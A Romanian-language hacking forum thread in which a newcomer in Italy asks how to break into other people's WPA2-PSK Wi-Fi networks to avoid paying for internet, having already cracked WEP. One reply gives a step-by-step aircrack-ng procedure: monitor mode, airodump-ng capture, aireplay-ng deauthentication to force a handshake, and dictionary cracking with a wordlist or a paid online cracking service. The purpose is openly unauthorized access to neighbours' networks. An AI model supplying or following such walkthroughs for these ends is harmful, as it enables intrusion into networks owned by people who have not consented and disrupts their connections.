Jump to content
rolly_love

Handshake

Recommended Posts

Salut ! ... Sunt nou aici si nou in toate astea . Imi cer scuze daca nu am ghicit din prima tema corecta pentru postul meu ... :(

As avea o intrebare , ce este un handshake si cum se afla el mai repede ( cu CommView for WI-FI ) preferabil , deoarece eu de ceva timp m-am mutat in Italia si la o prima impresie mie momentan abonamentele si serviciile italienilor pentru internet , nu imi convin si nu imi plac deloc , raportat la calitate/pret ... Incerc sa nu ofer prea multe despre ceea ce vreau , pentru ca stiu ca nu ii okey si intelegeti voi , ca sunteti experti majoritatea ... Deci , wep am reusit , dar as vrea una WPA2-PSK cu CommView for WI-FI ... Daca este vreun utilizator ce intelege ce borborosesc eu aici , l-as ruga frumos sa imi zica in " 3 , 4 cuvinte" ce este un handshake , cum se afla mai repede si daca exista vreo posibilitate de a reusi WPA2-PSK cu CommView for wi-fi ... Asta asa ca italienii tot vin la noi in tara si isi fac de cap ...:)) Multumesc tare mult , daca postul meu deranjeaza sau incalca regulile forumului , rog stergerea lui imediata , dar sunt incepator pe forumul vostru . Multumesc mult , Rolly .

Link to comment
Share on other sites

Daca esti in Italia , nici macar nu trebuie sa-ti bati capul cu handshake .

Pana afli ce ala ,cum se obtine si la ce foloseste , trec oportunitatile pe langa tine ...:D:D:D

Ai un instrument puternic , chiar daca nu merge pe toate retelele .

Se numeste UFOWardriving .

Pune capul la bataie si studiaza un pic singur .

PS

Orice roman aflat printre straini ,trebuie ajutat cumva ;)

Edited by sorelian
Link to comment
Share on other sites

Hey , va multumesc tare mult :D ... Ma apuc acum sa vad ce si cum ...P.S : Groaznic la astia cu netu , asa ceva nici in era paleolitica ... Platesti si nu merge , suni , ceri explicatii si toti ridica din umeri ... La capitolul net si telefonie , Romania lasa cu mult Italia in urma .

Edited by rolly_love
Link to comment
Share on other sites

Cea mai buna varianta este cu backtrack-u.

Banuiesc ca ai o antena wireless cu care poti face injection si sa functioneze in monitor mode.

Deschizi un terminal si ii bagi:

# airmon-ng

Iti alegi adaptoru wireless de ex wlan0 sau wlan1

# airmon-ng start wlan1 (interfata aleasa de tine)

Vei observa ca se va crea o interfata noua mon0

# airodump-ng mon0

Iti va aparea o lista cu retele wireless si sub ea o lista cu clienti care sunt conectati la retea

Pe prima coloana este bssid retelei, iti alegi un bssid la care sa ai semnal bun si sa fie cineva conectat (te uiti in lista de jos sa vezi daca adresa bssid are un client asociat).

# airodump-ng -c (aici scrii pe ce canal e wireless-u) --bssid (aici pui adresa bssid de la retea) -w (scrie orice nume pentru fisieru unde vor fi slavate date) mon0

Ex: # airodump-ng -c 6 --bssid 00:11:22:33:44:55 -w dlink mon0

O sa apara reteaua si sub ea trebuie sa apara cine e conectata la ea. Te asiguri ca se transfera date (pe coloana cu dates trebuie sa creasca numaru)

Apoi deschizi inca un terminal si acolo scrii:

# aireplay-ng -0 5 -a (adresa bssid a retelei) mon0

Dupa care trebuie sa iti apara in primu terminal WPS handshake: XX:XX:XX:XX:XX:XX

Apesi ctrl+c sau inchizi si te duci la celalalt terminal

Si scrii:

# aircrack-ng [numele care lai pus la -w]-01.cap -w

(Aici pui un dictionar de cuvinte numere etc).

Ex: airecrack-ng dlink-01.cap -w /pentest/paaswords/wordlists/rockyou.txt

Si acuma trebuie sa astepti sau poti sa pui handshake-u pe Online Hash Crack MD5 LM NTLM SHA1 MySQL MD4 OSX WPA(2) - Passwords Recovery da o sa te coste 5 euro.

Link to comment
Share on other sites

Hey Salut ... Pff cu blacktrak , imi prind urechile , abea m-am invatat cu Commview si cand am reusit cu WEP , eram ceva de genu " I have no idea what i'm doing here " , dar am reusit ... Se zice norocul prostului :))<a  href=%7Boption%7Dhttp://img402.imageshack.us/img402/4275/ipf1.jpg' alt='ipf1.jpg'> Uploaded with ImageShack.us

Cu UFO nu a mers din pacate .... As incerca cu BlackTrack ala ... dar nu am inteles inca ce este , sistem de operare , ceva program , habar nu am , ma tot uit la tutoriale , dar nu inteleg o iota ... Am descarcat ceva BlackTrack R5 Gnome-64 , dar este in "" carantina "" ca habar nu am ce ii ... Vai de " hack-areala din mine " .

Edited by rolly_love
Link to comment
Share on other sites

Hey salut .

1. Take it easy , " Co4ie "

2. Nu am asteptat mura-n gura , daca citesti primul meu post , cred ca am mentionat ca vreau ajutor cu Commview , membrii formumului care au avut binevointa de a incerca sa ma ajute , mi-au recomandat ceva ce parea a fi mai usor si evident cu ce au reusit ei , adica " blacktrack-ul" , lor le-am raspuns inapoi , ca eu personal , habar nu am ce este aia , caci nu ma pricep ... Daca tu te-ai nascut cu o capacitate de a cunoaste din primul minut de viata " Ce este distributia Linux " , ma bucur pentru tine ... Eu abea acum incep sa descopar , ce este si cu ce se mananca ... Cu tine sunt 2 posibilitati ... Ori te-ai nascut cu " distributia linux in fata ' ori ai uitat ca odata si tu ai fost novice in chestiile astea si acum posturile cu intrebari mediocre ( probabil ) pentru tine , par deranjante .

Link to comment
Share on other sites

Hey, multumesc ... Da , abea azi am aflat si eu , personal , cred ca asta este putin imposibil :|O sa incerc cu Blacktrak , dupa ce ma documentez ce este si cum se poate ...

se poate cu comview si aircrack dar daca nu ai parola in dictionar/lista de pass nu poti sa faci nimic.
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...